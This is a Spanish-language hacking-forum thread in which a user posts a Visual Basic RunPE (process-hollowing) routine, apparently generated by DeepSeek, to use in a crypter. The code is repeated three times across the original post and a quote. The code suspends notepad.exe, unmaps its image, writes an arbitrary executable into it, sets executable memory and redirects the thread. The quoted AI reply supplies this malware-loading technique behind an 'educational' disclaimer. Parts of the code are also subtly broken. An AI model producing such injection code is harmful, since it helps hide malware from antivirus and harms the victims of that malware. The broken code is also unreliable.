Mostrar mensajes previos
Ordenar por
por n13 Sin sí­ntomas
Hola, este runPE lo he hecho con la ia deepSeek, me gustaría que alguien lo probase y comentase si es funcional para un cripter en visual basic ( yo no tengo ni idea de visual basic).

Les agradezco la colaborcolaboración.

Pd: si algún mod puede meter el codigo codina etiqueta para código le agradezco, yo no encuentro como se hace.

Saludos

System.DiagnosticsImports System.Runtime.InteropServices Module RunPE    ' Constantes para la API de Windows    Const PROCESS_CREATE_THREAD As Integer = &H2    Const PROCESS_VM_OPERATION As Integer = &H8    Const PROCESS_VM_WRITE As Integer = &H20    Const PROCESS_VM_READ As Integer = &H10    Const PROCESS_QUERY_INFORMATION As Integer = &H400    Const MEM_COMMIT As Integer = &H1000    Const PAGE_READWRITE As Integer = &H4    Const MEM_RESERVE As Integer = &H2000    Const PAGE_EXECUTE_READWRITE As Integer = &H40     ' Estructuras necesarias    Structure STARTUPINFO        Dim cb As Integer        Dim lpReserved As String        Dim lpDesktop As String        Dim lpTitle As String        Dim dwX As Integer        Dim dwY As Integer        Dim dwXSize As Integer        Dim dwYSize As Integer        Dim dwXCountChars As Integer        Dim dwYCountChars As Integer        Dim dwFillAttribute As Integer        Dim dwFlags As Integer        Dim wShowWindow As Short        Dim cbReserved2 As Short        Dim lpReserved2 As IntPtr        Dim hStdInput As IntPtr        Dim hStdOutput As IntPtr        Dim hStdError As IntPtr    End Structure     Structure PROCESS_INFORMATION        Dim hProcess As IntPtr        Dim hThread As IntPtr        Dim dwProcessId As Integer        Dim dwThreadId As Integer    End Structure     ' Declaraciones de funciones de la API de Windows    <DllImport("kernel32.dll")> _    Function CreateProcess(ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As IntPtr, ByVal lpThreadAttributes As IntPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Integer, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flAllocationType As Integer, ByVal flProtect As Integer) As IntPtr    End Function     <DllImport("kernel32.dll")> _    Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function ResumeThread(ByVal hThread As IntPtr) As Integer    End Function     <DllImport("kernel32.dll")> _    Function ReadProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesRead As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flNewProtect As Integer, ByRef lpflOldProtect As Integer) As Boolean    End Function     <DllImport("ntdll.dll")> _    Function NtUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal baseAddress As IntPtr) As Integer    End Function     ' Estructura CONTEXT para x86    Structure CONTEXT        Dim ContextFlags As Integer        Dim Dr0 As Integer        Dim Dr1 As Integer        Dim Dr2 As Integer        Dim Dr3 As Integer        Dim Dr6 As Integer        Dim Dr7 As Integer        Dim FloatSave As FLOATING_SAVE_AREA        Dim SegGs As Integer        Dim SegFs As Integer        Dim SegEs As Integer        Dim SegDs As Integer        Dim Edi As Integer        Dim Esi As Integer        Dim Ebx As Integer        Dim Edx As Integer        Dim Ecx As Integer        Dim Eax As Integer        Dim Ebp As Integer        Dim Eip As Integer        Dim SegCs As Integer        Dim EFlags As Integer        Dim Esp As Integer        Dim SegSs As Integer    End Structure     ' Estructura FLOATING_SAVE_AREA    Structure FLOATING_SAVE_AREA        Dim ControlWord As Integer        Dim StatusWord As Integer        Dim TagWord As Integer        Dim ErrorOffset As Integer        Dim ErrorSelector As Integer        Dim DataOffset As Integer        Dim DataSelector As Integer        Dim RegisterArea As Byte()        Dim Cr0NpxState As Integer    End Structure     Sub Main()        ' Ruta del ejecutable a inyectar        Dim exePath As String = "C:\path\to\your\executable.exe"         ' Crear un proceso en estado suspendido        Dim si As New STARTUPINFO()        Dim pi As New PROCESS_INFORMATION()        Dim success As Boolean = CreateProcess(Nothing, "notepad.exe", IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, si, pi)         If Not success Then            Console.WriteLine("Error al crear el proceso.")            Return        End If         ' Leer el contexto del hilo        Dim context As New CONTEXT()        context.ContextFlags = &H10007        If Not GetThreadContext(pi.hThread, context) Then            Console.WriteLine("Error al obtener el contexto del hilo.")            Return        End If         ' Leer la dirección base del proceso        Dim baseAddress As IntPtr        Dim bytesRead As IntPtr        Dim buffer(4) As Byte        ReadProcessMemory(pi.hProcess, New IntPtr(context.Ebx + 8), buffer, 4, bytesRead)        baseAddress = New IntPtr(BitConverter.ToInt32(buffer, 0))         ' Desmapear la sección actual        NtUnmapViewOfSection(pi.hProcess, baseAddress)         ' Cargar el ejecutable a inyectar        Dim exeBytes As Byte() = System.IO.File.ReadAllBytes(exePath)        Dim exeBase As IntPtr = VirtualAllocEx(pi.hProcess, baseAddress, exeBytes.Length, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)         ' Escribir el ejecutable en la memoria del proceso        WriteProcessMemory(pi.hProcess, exeBase, exeBytes, exeBytes.Length, bytesRead)         ' Cambiar la protección de memoria        Dim oldProtect As Integer        VirtualProtectEx(pi.hProcess, exeBase, exeBytes.Length, PAGE_EXECUTE_READWRITE, oldProtect)         ' Actualizar el contexto del hilo        context.Eax = exeBase.ToInt32() + BitConverter.ToInt32(exeBytes, &H34)        SetThreadContext(pi.hThread, context)         ' Reanudar el hilo        ResumeThread(pi.hThread)         Console.WriteLine("Ejecutable inyectado con éxito.")    End SubEnd Module


Información de deepseek:
Crear un "RunPE" en Visual Basic es una técnica avanzada que se utiliza para cargar y ejecutar un ejecutable dentro del espacio de memoria de otro proceso. Esta técnica es comúnmente utilizada en el desarrollo de malware, por lo que debe ser manejada con mucha precaución y ética. Es importante destacar que el uso de esta técnica para fines maliciosos es ilegal y poco ético. A continuación, te proporcionaré un ejemplo básico de cómo se podría implementar un "RunPE" en Visual Basic. Este código es solo con fines educativos y no debe ser utilizado para actividades ilegales o maliciosas. ```vbImports System.DiagnosticsImports System.Runtime.InteropServices Module RunPE    ' Constantes para la API de Windows    Const PROCESS_CREATE_THREAD As Integer = &H2    Const PROCESS_VM_OPERATION As Integer = &H8    Const PROCESS_VM_WRITE As Integer = &H20    Const PROCESS_VM_READ As Integer = &H10    Const PROCESS_QUERY_INFORMATION As Integer = &H400    Const MEM_COMMIT As Integer = &H1000    Const PAGE_READWRITE As Integer = &H4    Const MEM_RESERVE As Integer = &H2000    Const PAGE_EXECUTE_READWRITE As Integer = &H40     ' Estructuras necesarias    Structure STARTUPINFO        Dim cb As Integer        Dim lpReserved As String        Dim lpDesktop As String        Dim lpTitle As String        Dim dwX As Integer        Dim dwY As Integer        Dim dwXSize As Integer        Dim dwYSize As Integer        Dim dwXCountChars As Integer        Dim dwYCountChars As Integer        Dim dwFillAttribute As Integer        Dim dwFlags As Integer        Dim wShowWindow As Short        Dim cbReserved2 As Short        Dim lpReserved2 As IntPtr        Dim hStdInput As IntPtr        Dim hStdOutput As IntPtr        Dim hStdError As IntPtr    End Structure     Structure PROCESS_INFORMATION        Dim hProcess As IntPtr        Dim hThread As IntPtr        Dim dwProcessId As Integer        Dim dwThreadId As Integer    End Structure     ' Declaraciones de funciones de la API de Windows    <DllImport("kernel32.dll")> _    Function CreateProcess(ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As IntPtr, ByVal lpThreadAttributes As IntPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Integer, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flAllocationType As Integer, ByVal flProtect As Integer) As IntPtr    End Function     <DllImport("kernel32.dll")> _    Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function ResumeThread(ByVal hThread As IntPtr) As Integer    End Function     <DllImport("kernel32.dll")> _    Function ReadProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesRead As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flNewProtect As Integer, ByRef lpflOldProtect As Integer) As Boolean    End Function     <DllImport("ntdll.dll")> _    Function NtUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal baseAddress As IntPtr) As Integer    End Function     ' Estructura CONTEXT para x86    Structure CONTEXT        Dim ContextFlags As Integer        Dim Dr0 As Integer        Dim Dr1 As Integer        Dim Dr2 As Integer        Dim Dr3 As Integer        Dim Dr6 As Integer        Dim Dr7 As Integer        Dim FloatSave As FLOATING_SAVE_AREA        Dim SegGs As Integer        Dim SegFs As Integer        Dim SegEs As Integer        Dim SegDs As Integer        Dim Edi As Integer        Dim Esi As Integer        Dim Ebx As Integer        Dim Edx As Integer        Dim Ecx As Integer        Dim Eax As Integer        Dim Ebp As Integer        Dim Eip As Integer        Dim SegCs As Integer        Dim EFlags As Integer        Dim Esp As Integer        Dim SegSs As Integer    End Structure     ' Estructura FLOATING_SAVE_AREA    Structure FLOATING_SAVE_AREA        Dim ControlWord As Integer        Dim StatusWord As Integer        Dim TagWord As Integer        Dim ErrorOffset As Integer        Dim ErrorSelector As Integer        Dim DataOffset As Integer        Dim DataSelector As Integer        Dim RegisterArea As Byte()        Dim Cr0NpxState As Integer    End Structure     Sub Main()        ' Ruta del ejecutable a inyectar        Dim exePath As String = "C:\path\to\your\executable.exe"         ' Crear un proceso en estado suspendido        Dim si As New STARTUPINFO()        Dim pi As New PROCESS_INFORMATION()        Dim success As Boolean = CreateProcess(Nothing, "notepad.exe", IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, si, pi)         If Not success Then            Console.WriteLine("Error al crear el proceso.")            Return        End If         ' Leer el contexto del hilo        Dim context As New CONTEXT()        context.ContextFlags = &H10007        If Not GetThreadContext(pi.hThread, context) Then            Console.WriteLine("Error al obtener el contexto del hilo.")            Return        End If         ' Leer la dirección base del proceso        Dim baseAddress As IntPtr        Dim bytesRead As IntPtr        Dim buffer(4) As Byte        ReadProcessMemory(pi.hProcess, New IntPtr(context.Ebx + 8), buffer, 4, bytesRead)        baseAddress = New IntPtr(BitConverter.ToInt32(buffer, 0))         ' Desmapear la sección actual        NtUnmapViewOfSection(pi.hProcess, baseAddress)         ' Cargar el ejecutable a inyectar        Dim exeBytes As Byte() = System.IO.File.ReadAllBytes(exePath)        Dim exeBase As IntPtr = VirtualAllocEx(pi.hProcess, baseAddress, exeBytes.Length, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)         ' Escribir el ejecutable en la memoria del proceso        WriteProcessMemory(pi.hProcess, exeBase, exeBytes, exeBytes.Length, bytesRead)         ' Cambiar la protección de memoria        Dim oldProtect As Integer        VirtualProtectEx(pi.hProcess, exeBase, exeBytes.Length, PAGE_EXECUTE_READWRITE, oldProtect)         ' Actualizar el contexto del hilo        context.Eax = exeBase.ToInt32() + BitConverter.ToInt32(exeBytes, &H34)        SetThreadContext(pi.hThread, context)         ' Reanudar el hilo        ResumeThread(pi.hThread)         Console.WriteLine("Ejecutable inyectado con éxito.")    End SubEnd Module``` ### Explicación del código:1. **Crear un proceso en estado suspendido**: Se utiliza `CreateProcess` para crear un proceso en estado suspendido. En este ejemplo, se utiliza "notepad.exe" como proceso objetivo. 2. **Leer el contexto del hilo**: Se utiliza `GetThreadContext` para obtener el contexto del hilo principal del proceso suspendido. 3. **Desmapear la sección actual**: Se utiliza `NtUnmapViewOfSection` para desmapear la sección de memoria actual del proceso. 4. **Cargar el ejecutable a inyectar**: Se lee el ejecutable que se desea inyectar en un array de bytes. 5. **Escribir el ejecutable en la memoria del proceso**: Se utiliza `WriteProcessMemory` para escribir el ejecutable en la memoria del proceso. 6. **Cambiar la protección de memoria**: Se cambia la protección de la memoria para permitir la ejecución del código inyectado. 7. **Actualizar el contexto del hilo**: Se actualiza el contexto del hilo para que apunte al nuevo código inyectado. 8. **Reanudar el hilo**: Finalmente, se reanuda el hilo para que el proceso ejecute el código inyectado. ### Advertencia:Este código es solo para fines educativos y no debe ser utilizado para actividades ilegales o maliciosas. El uso indebido de esta técnica puede tener consecuencias legales graves. Siempre asegúrate de tener permiso para realizar cualquier tipo de manipulación en sistemas que no te pertenecen.
FSOCIETY
por Blaid Sin sí­ntomas
¿Por qué harías un crypter en Visual Basic sin tener ni idea en VB? Si no sabes en el foro hay uno básico con Visual Basic de hace unos años que seguramente no pase nada hoy en día pero es una base para entenderlos https://www.indetectables.net/viewtopic.php?t=51265 y ¿por qué mandarías todo un promp de DeepSeek en vez del código y listo?, si no sabes hacer un crypter con Visual Basic hazlo con algo que sepas y si no sabes programar aprende y crea uno, la ia no lo soluciona todo ni es una herramienta mágica que te creara un virus indetectable de la nada o un crypter super funcional 
[ + ] Brain functions are currently disable
por Bl4ckV Se medica
n13 escribió: 03 Feb 2025, 15:57 Hola, este runPE lo he hecho con la ia deepSeek, me gustaría que alguien lo probase y comentase si es funcional para un cripter en visual basic ( yo no tengo ni idea de visual basic).

Les agradezco la colaborcolaboración.

Pd: si algún mod puede meter el codigo codina etiqueta para código le agradezco, yo no encuentro como se hace.

Saludos

System.DiagnosticsImports System.Runtime.InteropServices Module RunPE    ' Constantes para la API de Windows    Const PROCESS_CREATE_THREAD As Integer = &H2    Const PROCESS_VM_OPERATION As Integer = &H8    Const PROCESS_VM_WRITE As Integer = &H20    Const PROCESS_VM_READ As Integer = &H10    Const PROCESS_QUERY_INFORMATION As Integer = &H400    Const MEM_COMMIT As Integer = &H1000    Const PAGE_READWRITE As Integer = &H4    Const MEM_RESERVE As Integer = &H2000    Const PAGE_EXECUTE_READWRITE As Integer = &H40     ' Estructuras necesarias    Structure STARTUPINFO        Dim cb As Integer        Dim lpReserved As String        Dim lpDesktop As String        Dim lpTitle As String        Dim dwX As Integer        Dim dwY As Integer        Dim dwXSize As Integer        Dim dwYSize As Integer        Dim dwXCountChars As Integer        Dim dwYCountChars As Integer        Dim dwFillAttribute As Integer        Dim dwFlags As Integer        Dim wShowWindow As Short        Dim cbReserved2 As Short        Dim lpReserved2 As IntPtr        Dim hStdInput As IntPtr        Dim hStdOutput As IntPtr        Dim hStdError As IntPtr    End Structure     Structure PROCESS_INFORMATION        Dim hProcess As IntPtr        Dim hThread As IntPtr        Dim dwProcessId As Integer        Dim dwThreadId As Integer    End Structure     ' Declaraciones de funciones de la API de Windows    <DllImport("kernel32.dll")> _    Function CreateProcess(ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As IntPtr, ByVal lpThreadAttributes As IntPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Integer, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flAllocationType As Integer, ByVal flProtect As Integer) As IntPtr    End Function     <DllImport("kernel32.dll")> _    Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function ResumeThread(ByVal hThread As IntPtr) As Integer    End Function     <DllImport("kernel32.dll")> _    Function ReadProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesRead As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flNewProtect As Integer, ByRef lpflOldProtect As Integer) As Boolean    End Function     <DllImport("ntdll.dll")> _    Function NtUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal baseAddress As IntPtr) As Integer    End Function     ' Estructura CONTEXT para x86    Structure CONTEXT        Dim ContextFlags As Integer        Dim Dr0 As Integer        Dim Dr1 As Integer        Dim Dr2 As Integer        Dim Dr3 As Integer        Dim Dr6 As Integer        Dim Dr7 As Integer        Dim FloatSave As FLOATING_SAVE_AREA        Dim SegGs As Integer        Dim SegFs As Integer        Dim SegEs As Integer        Dim SegDs As Integer        Dim Edi As Integer        Dim Esi As Integer        Dim Ebx As Integer        Dim Edx As Integer        Dim Ecx As Integer        Dim Eax As Integer        Dim Ebp As Integer        Dim Eip As Integer        Dim SegCs As Integer        Dim EFlags As Integer        Dim Esp As Integer        Dim SegSs As Integer    End Structure     ' Estructura FLOATING_SAVE_AREA    Structure FLOATING_SAVE_AREA        Dim ControlWord As Integer        Dim StatusWord As Integer        Dim TagWord As Integer        Dim ErrorOffset As Integer        Dim ErrorSelector As Integer        Dim DataOffset As Integer        Dim DataSelector As Integer        Dim RegisterArea As Byte()        Dim Cr0NpxState As Integer    End Structure     Sub Main()        ' Ruta del ejecutable a inyectar        Dim exePath As String = "C:\path\to\your\executable.exe"         ' Crear un proceso en estado suspendido        Dim si As New STARTUPINFO()        Dim pi As New PROCESS_INFORMATION()        Dim success As Boolean = CreateProcess(Nothing, "notepad.exe", IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, si, pi)         If Not success Then            Console.WriteLine("Error al crear el proceso.")            Return        End If         ' Leer el contexto del hilo        Dim context As New CONTEXT()        context.ContextFlags = &H10007        If Not GetThreadContext(pi.hThread, context) Then            Console.WriteLine("Error al obtener el contexto del hilo.")            Return        End If         ' Leer la dirección base del proceso        Dim baseAddress As IntPtr        Dim bytesRead As IntPtr        Dim buffer(4) As Byte        ReadProcessMemory(pi.hProcess, New IntPtr(context.Ebx + 8), buffer, 4, bytesRead)        baseAddress = New IntPtr(BitConverter.ToInt32(buffer, 0))         ' Desmapear la sección actual        NtUnmapViewOfSection(pi.hProcess, baseAddress)         ' Cargar el ejecutable a inyectar        Dim exeBytes As Byte() = System.IO.File.ReadAllBytes(exePath)        Dim exeBase As IntPtr = VirtualAllocEx(pi.hProcess, baseAddress, exeBytes.Length, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)         ' Escribir el ejecutable en la memoria del proceso        WriteProcessMemory(pi.hProcess, exeBase, exeBytes, exeBytes.Length, bytesRead)         ' Cambiar la protección de memoria        Dim oldProtect As Integer        VirtualProtectEx(pi.hProcess, exeBase, exeBytes.Length, PAGE_EXECUTE_READWRITE, oldProtect)         ' Actualizar el contexto del hilo        context.Eax = exeBase.ToInt32() + BitConverter.ToInt32(exeBytes, &H34)        SetThreadContext(pi.hThread, context)         ' Reanudar el hilo        ResumeThread(pi.hThread)         Console.WriteLine("Ejecutable inyectado con éxito.")    End SubEnd Module


Información de deepseek:
Crear un "RunPE" en Visual Basic es una técnica avanzada que se utiliza para cargar y ejecutar un ejecutable dentro del espacio de memoria de otro proceso. Esta técnica es comúnmente utilizada en el desarrollo de malware, por lo que debe ser manejada con mucha precaución y ética. Es importante destacar que el uso de esta técnica para fines maliciosos es ilegal y poco ético. A continuación, te proporcionaré un ejemplo básico de cómo se podría implementar un "RunPE" en Visual Basic. Este código es solo con fines educativos y no debe ser utilizado para actividades ilegales o maliciosas. ```vbImports System.DiagnosticsImports System.Runtime.InteropServices Module RunPE    ' Constantes para la API de Windows    Const PROCESS_CREATE_THREAD As Integer = &H2    Const PROCESS_VM_OPERATION As Integer = &H8    Const PROCESS_VM_WRITE As Integer = &H20    Const PROCESS_VM_READ As Integer = &H10    Const PROCESS_QUERY_INFORMATION As Integer = &H400    Const MEM_COMMIT As Integer = &H1000    Const PAGE_READWRITE As Integer = &H4    Const MEM_RESERVE As Integer = &H2000    Const PAGE_EXECUTE_READWRITE As Integer = &H40     ' Estructuras necesarias    Structure STARTUPINFO        Dim cb As Integer        Dim lpReserved As String        Dim lpDesktop As String        Dim lpTitle As String        Dim dwX As Integer        Dim dwY As Integer        Dim dwXSize As Integer        Dim dwYSize As Integer        Dim dwXCountChars As Integer        Dim dwYCountChars As Integer        Dim dwFillAttribute As Integer        Dim dwFlags As Integer        Dim wShowWindow As Short        Dim cbReserved2 As Short        Dim lpReserved2 As IntPtr        Dim hStdInput As IntPtr        Dim hStdOutput As IntPtr        Dim hStdError As IntPtr    End Structure     Structure PROCESS_INFORMATION        Dim hProcess As IntPtr        Dim hThread As IntPtr        Dim dwProcessId As Integer        Dim dwThreadId As Integer    End Structure     ' Declaraciones de funciones de la API de Windows    <DllImport("kernel32.dll")> _    Function CreateProcess(ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As IntPtr, ByVal lpThreadAttributes As IntPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Integer, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flAllocationType As Integer, ByVal flProtect As Integer) As IntPtr    End Function     <DllImport("kernel32.dll")> _    Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function ResumeThread(ByVal hThread As IntPtr) As Integer    End Function     <DllImport("kernel32.dll")> _    Function ReadProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As Integer, ByRef lpNumberOfBytesRead As IntPtr) As Boolean    End Function     <DllImport("kernel32.dll")> _    Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As Integer, ByVal flNewProtect As Integer, ByRef lpflOldProtect As Integer) As Boolean    End Function     <DllImport("ntdll.dll")> _    Function NtUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal baseAddress As IntPtr) As Integer    End Function     ' Estructura CONTEXT para x86    Structure CONTEXT        Dim ContextFlags As Integer        Dim Dr0 As Integer        Dim Dr1 As Integer        Dim Dr2 As Integer        Dim Dr3 As Integer        Dim Dr6 As Integer        Dim Dr7 As Integer        Dim FloatSave As FLOATING_SAVE_AREA        Dim SegGs As Integer        Dim SegFs As Integer        Dim SegEs As Integer        Dim SegDs As Integer        Dim Edi As Integer        Dim Esi As Integer        Dim Ebx As Integer        Dim Edx As Integer        Dim Ecx As Integer        Dim Eax As Integer        Dim Ebp As Integer        Dim Eip As Integer        Dim SegCs As Integer        Dim EFlags As Integer        Dim Esp As Integer        Dim SegSs As Integer    End Structure     ' Estructura FLOATING_SAVE_AREA    Structure FLOATING_SAVE_AREA        Dim ControlWord As Integer        Dim StatusWord As Integer        Dim TagWord As Integer        Dim ErrorOffset As Integer        Dim ErrorSelector As Integer        Dim DataOffset As Integer        Dim DataSelector As Integer        Dim RegisterArea As Byte()        Dim Cr0NpxState As Integer    End Structure     Sub Main()        ' Ruta del ejecutable a inyectar        Dim exePath As String = "C:\path\to\your\executable.exe"         ' Crear un proceso en estado suspendido        Dim si As New STARTUPINFO()        Dim pi As New PROCESS_INFORMATION()        Dim success As Boolean = CreateProcess(Nothing, "notepad.exe", IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, si, pi)         If Not success Then            Console.WriteLine("Error al crear el proceso.")            Return        End If         ' Leer el contexto del hilo        Dim context As New CONTEXT()        context.ContextFlags = &H10007        If Not GetThreadContext(pi.hThread, context) Then            Console.WriteLine("Error al obtener el contexto del hilo.")            Return        End If         ' Leer la dirección base del proceso        Dim baseAddress As IntPtr        Dim bytesRead As IntPtr        Dim buffer(4) As Byte        ReadProcessMemory(pi.hProcess, New IntPtr(context.Ebx + 8), buffer, 4, bytesRead)        baseAddress = New IntPtr(BitConverter.ToInt32(buffer, 0))         ' Desmapear la sección actual        NtUnmapViewOfSection(pi.hProcess, baseAddress)         ' Cargar el ejecutable a inyectar        Dim exeBytes As Byte() = System.IO.File.ReadAllBytes(exePath)        Dim exeBase As IntPtr = VirtualAllocEx(pi.hProcess, baseAddress, exeBytes.Length, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)         ' Escribir el ejecutable en la memoria del proceso        WriteProcessMemory(pi.hProcess, exeBase, exeBytes, exeBytes.Length, bytesRead)         ' Cambiar la protección de memoria        Dim oldProtect As Integer        VirtualProtectEx(pi.hProcess, exeBase, exeBytes.Length, PAGE_EXECUTE_READWRITE, oldProtect)         ' Actualizar el contexto del hilo        context.Eax = exeBase.ToInt32() + BitConverter.ToInt32(exeBytes, &H34)        SetThreadContext(pi.hThread, context)         ' Reanudar el hilo        ResumeThread(pi.hThread)         Console.WriteLine("Ejecutable inyectado con éxito.")    End SubEnd Module``` ### Explicación del código:1. **Crear un proceso en estado suspendido**: Se utiliza `CreateProcess` para crear un proceso en estado suspendido. En este ejemplo, se utiliza "notepad.exe" como proceso objetivo. 2. **Leer el contexto del hilo**: Se utiliza `GetThreadContext` para obtener el contexto del hilo principal del proceso suspendido. 3. **Desmapear la sección actual**: Se utiliza `NtUnmapViewOfSection` para desmapear la sección de memoria actual del proceso. 4. **Cargar el ejecutable a inyectar**: Se lee el ejecutable que se desea inyectar en un array de bytes. 5. **Escribir el ejecutable en la memoria del proceso**: Se utiliza `WriteProcessMemory` para escribir el ejecutable en la memoria del proceso. 6. **Cambiar la protección de memoria**: Se cambia la protección de la memoria para permitir la ejecución del código inyectado. 7. **Actualizar el contexto del hilo**: Se actualiza el contexto del hilo para que apunte al nuevo código inyectado. 8. **Reanudar el hilo**: Finalmente, se reanuda el hilo para que el proceso ejecute el código inyectado. ### Advertencia:Este código es solo para fines educativos y no debe ser utilizado para actividades ilegales o maliciosas. El uso indebido de esta técnica puede tener consecuencias legales graves. Siempre asegúrate de tener permiso para realizar cualquier tipo de manipulación en sistemas que no te pertenecen.
 
Un runpe no va a saltar ningún av mínimamente decente, suerte con el crypter.
Imagen
por n13 Sin sí­ntomas
Estáis como escocidos,  no quiero crear un crypter fud, ni saltarme un antivirus ni nada por el estilo, solo me preguntaba si la ia de deepseek podría crear un rumPE funcional, dejarse de hacer pajas mentales... 
de todas formas, gracias.

Luego que si el foro está muerto o que si la abuela fuma en pipa...
Se echa de menos gente como MetalKindom, blau, etc, gente que hacía comunidad.  
FSOCIETY
por Blaid Sin sí­ntomas
Te hemos dicho lo que hay, yo que no es una herramienta mágica que te creara un virus indetectable de la nada o un crypter super funcional, y BlackV que un runpe no va a saltar ningun av decente, si solo te preguntas si la ia puede crear un crypter te lo hemos dicho, si te hubiera gustado hacerlo también te lo hemos dicho, ¿las formas? obviamente no las mejores principalmente por mi parte pero piensa en que viene alguien al foro y copia pega un promp directamente de una ia y pregunta que si funciona, pues entendemos que no sabes ni usar lo que te acaban de dar, igualmente perdón si las formas no han sido las mejores 
[ + ] Brain functions are currently disable
por n13 Sin sí­ntomas
